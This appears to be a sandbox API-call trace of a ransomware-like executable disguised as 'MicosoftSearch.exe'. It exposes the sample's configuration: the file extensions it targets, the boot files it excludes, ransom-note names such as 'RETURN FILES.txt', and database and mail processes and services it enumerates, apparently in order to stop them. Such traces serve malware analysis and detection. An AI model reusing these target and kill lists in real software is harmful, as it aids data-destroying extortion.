RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7198 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd71b0 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xbd71c8 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd71e0 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd71f8 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7210 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7228 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7240 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7258 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7270 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7288 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd72a0 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd72b8 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd72d0 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd72e8 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7300 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7318 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7330 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7348 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7360 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xbd7378 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x12) returned 0xb8f1d0 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7390 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd73d0 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd73e8 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7400 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7418 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7430 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7448 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7460 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7478 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7490 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd74a8 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd74c0 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd74d8 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd74f0 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7508 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7520 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7538 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7550 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7568 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7580 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xbd7598 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xbd75b0 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xbd75c8 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xe) returned 0xbd75e0 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xbd75f8 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb927a0 [0031.961] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7610 [0031.962] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb927b0 [0031.962] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7628 [0031.962] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7640 [0031.962] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7658 [0031.962] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xbd7670 [0031.962] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xbd7688 [0031.962] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd76a0 [0031.962] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xbd76b8 [0031.962] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd76d0 [0031.962] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd76e8 [0031.962] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xbd7700 [0031.962] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7718 [0031.962] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xbd7730 [0031.962] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xbd7748 [0031.962] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7760 [0031.962] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb927c0 [0031.962] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7778 [0031.962] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7790 [0031.962] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb91920, Size=0x800) returned 0xbb3bb8 [0031.962] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0031.962] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbd5bb0 | out: hHeap=0xb10000) returned 1 [0031.962] lstrlenW (lpString="") returned 0 [0031.962] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbd7d50 | out: hHeap=0xb10000) returned 1 [0031.962] lstrlenW (lpString=".php") returned 4 [0031.962] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c778, Size=0x8) returned 0xb6c778 [0031.962] lstrlenW (lpString=".php") returned 4 [0031.962] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbd7d50 | out: hHeap=0xb10000) returned 1 [0031.962] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd7d80, Size=0x20) returned 0xb6cd78 [0031.963] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6cd78, Size=0x40) returned 0xb7d2f8 [0031.963] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb7d2f8, Size=0x80) returned 0xbd3bc8 [0031.963] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb92830, Size=0x8) returned 0xb92840 [0031.963] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb92840, Size=0x10) returned 0xbd7d80 [0031.963] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd7d80, Size=0x20) returned 0xb6d0e8 [0031.963] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0031.963] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbd3bc8 | out: hHeap=0xb10000) returned 1 [0031.963] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd7db0, Size=0x20) returned 0xb6cd50 [0031.963] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6cd50, Size=0x40) returned 0xb7d2f8 [0031.963] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0031.963] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0031.963] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb7d2f8 | out: hHeap=0xb10000) returned 1 [0031.963] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd7db0, Size=0x20) returned 0xb6cd50 [0031.963] lstrlenW (lpString="Info.hta") returned 8 [0031.963] lstrlenW (lpString="Info.hta") returned 8 [0031.963] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6cd50 | out: hHeap=0xb10000) returned 1 [0031.963] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xbb43c0, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MicosoftSearch.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\micosoftsearch.exe")) returned 0x38 [0031.963] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbb43c0 | out: hHeap=0xb10000) returned 1 [0031.963] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0031.963] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6d0e8, Size=0x40) returned 0xb7d2f8 [0031.963] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd7db0, Size=0x20) returned 0xb6d0e8 [0031.964] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd7db0, Size=0x20) returned 0xb6cd50 [0031.964] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6cd50, Size=0x40) returned 0xb7d340 [0031.964] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb7d340, Size=0x80) returned 0xbd3bc8 [0031.964] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd3bc8, Size=0x100) returned 0xbe7ff0 [0031.964] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.964] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbe7ff0 | out: hHeap=0xb10000) returned 1 [0031.964] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0xbb43c0, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc [0031.964] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbd7fe8 | out: hHeap=0xb10000) returned 1 [0031.964] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbb43c0 | out: hHeap=0xb10000) returned 1 [0031.964] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb92840, Size=0x8) returned 0xb92830 [0031.964] lstrlenW (lpString="%windir%;") returned 9 [0031.964] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6d0e8 | out: hHeap=0xb10000) returned 1 [0031.964] lstrlenW (lpString="C:\\Windows;") returned 11 [0031.964] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xba3bb0 | out: hHeap=0xb10000) returned 1 [0031.965] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd7dc8, Size=0x20) returned 0xb6d0e8 [0031.965] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6d0e8, Size=0x40) returned 0xb7d340 [0031.965] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb7d340, Size=0x80) returned 0xbd3bc8 [0031.965] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd3bc8, Size=0x100) returned 0xbd5bb0 [0031.965] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb92870, Size=0x8) returned 0xb92880 [0031.965] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb92880, Size=0x10) returned 0xbd7e10 [0031.965] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd7e10, Size=0x20) returned 0xb6d0e8 [0031.965] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb92840, Size=0x8) returned 0xb92880 [0031.965] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb92850, Size=0x8) returned 0xb92840 [0031.965] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb92870, Size=0x8) returned 0xb92890 [0031.965] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb92890, Size=0x10) returned 0xbd7eb8 [0031.966] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd7eb8, Size=0x20) returned 0xb6cd50 [0031.966] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb92880, Size=0x10) returned 0xbd7eb8 [0031.966] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb92840, Size=0x10) returned 0xbd7ee8 [0031.966] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb92880, Size=0x8) returned 0xb92870 [0031.966] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb928a0, Size=0x8) returned 0xb928b0 [0031.966] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd7eb8, Size=0x20) returned 0xb8fd70 [0031.966] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd7ee8, Size=0x20) returned 0xb8fd20 [0031.966] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb928c0, Size=0x8) returned 0xb928d0 [0031.966] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0031.966] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbd5bb0 | out: hHeap=0xb10000) returned 1 [0031.966] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd7f60, Size=0x20) returned 0xb8fd98 [0032.835] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0xbb43c0, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0032.835] lstrlenW (lpString="C:\\") returned 3 [0032.835] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18fc18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fc18*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0032.835] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbb43c0 | out: hHeap=0xb10000) returned 1 [0032.839] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xbf9d08, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MicosoftSearch.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\micosoftsearch.exe")) returned 0x38 [0033.546] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbf9d08 | out: hHeap=0xb10000) returned 1 [0033.546] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0033.546] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0xbf9d08, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc [0033.546] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2e30048 | out: hHeap=0xb10000) returned 1 [0033.547] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbf9d08 | out: hHeap=0xb10000) returned 1 [0033.547] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0xbe82f0, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0033.547] lstrlenW (lpString="C:\\") returned 3 [0033.548] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18fc18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fc18*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0033.548] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbe82f0 | out: hHeap=0xb10000) returned 1 [0033.551] WaitForMultipleObjects (nCount=0x2, lpHandles=0xb90508*=0x11c, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0x964 Thread: id = 4 os_tid = 0x970 [0032.154] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xbd7f60 [0032.154] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd7f60, Size=0x20) returned 0xb8fdc0 [0032.154] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8fdc0, Size=0x40) returned 0xb7d340 [0032.155] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb7d340, Size=0x80) returned 0xbd3cd8 [0032.155] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd3cd8, Size=0x100) returned 0xbd5dc0 [0032.155] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xbd7f60 [0032.155] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd7f60, Size=0x20) returned 0xb8fdc0 [0032.155] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8fdc0, Size=0x40) returned 0xb7d340 [0032.155] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb7d340, Size=0x80) returned 0xbd3cd8 [0032.155] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd3cd8, Size=0x100) returned 0xbd5ec8 [0032.155] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xbd7f60 [0032.155] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x4) returned 0xb928e0 [0032.155] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xbd7f78 [0032.155] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb928e0, Size=0x8) returned 0xb928f0 [0032.155] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x14) returned 0xb8f2b0 [0032.155] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb928f0, Size=0x10) returned 0xbd7f90 [0032.155] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x18) returned 0xb8f2d0 [0032.155] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x1a) returned 0xb8fdc0 [0032.155] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd7f90, Size=0x20) returned 0xb8fde8 [0032.155] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x1c) returned 0xb8fe10 [0032.155] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x16) returned 0xb8f2f0 [0032.155] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x1a) returned 0xb8fe38 [0032.155] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xbd7f90 [0032.155] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x4) returned 0xb928f0 [0032.155] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40) returned 0xb7d340 [0032.155] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb928f0, Size=0x8) returned 0xb928e0 [0032.155] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x3c) returned 0xb7d388 [0032.155] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb928e0, Size=0x10) returned 0xbd5fe8 [0032.155] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x14) returned 0xb8f310 [0032.155] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x18) returned 0xb8f330 [0032.155] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd5fe8, Size=0x20) returned 0xb8fe60 [0032.155] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x24) returned 0xbd63d0 [0032.155] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0032.155] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbd5dc0 | out: hHeap=0xb10000) returned 1 [0032.155] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0032.155] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbd5ec8 | out: hHeap=0xb10000) returned 1 [0032.155] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb8ff00 [0032.156] EnumServicesStatusExW (in: hSCManager=0xb8ff00, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0032.156] GetLastError () returned 0xea [0032.156] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x11e4) returned 0xba4bf0 [0032.157] EnumServicesStatusExW (in: hSCManager=0xb8ff00, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xba4bf0, cbBufSize=0x11e4, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xba4bf0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0032.157] CloseServiceHandle (hSCObject=0xb8ff00) returned 1 [0032.157] lstrlenW (lpString="Appinfo") returned 7 [0032.157] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0032.157] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0032.157] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0032.157] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0032.157] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0032.157] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0032.157] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0032.158] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0032.158] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0032.158] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0032.158] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0032.158] lstrlenW (lpString="AudioSrv") returned 8 [0032.158] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0032.158] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0032.158] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0032.158] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0032.158] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0032.158] lstrlenW (lpString="BFE") returned 3 [0032.158] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0032.158] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0032.158] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0032.158] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0032.158] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0032.158] lstrlenW (lpString="CryptSvc") returned 8 [0032.158] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0032.158] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0032.158] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0032.158] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 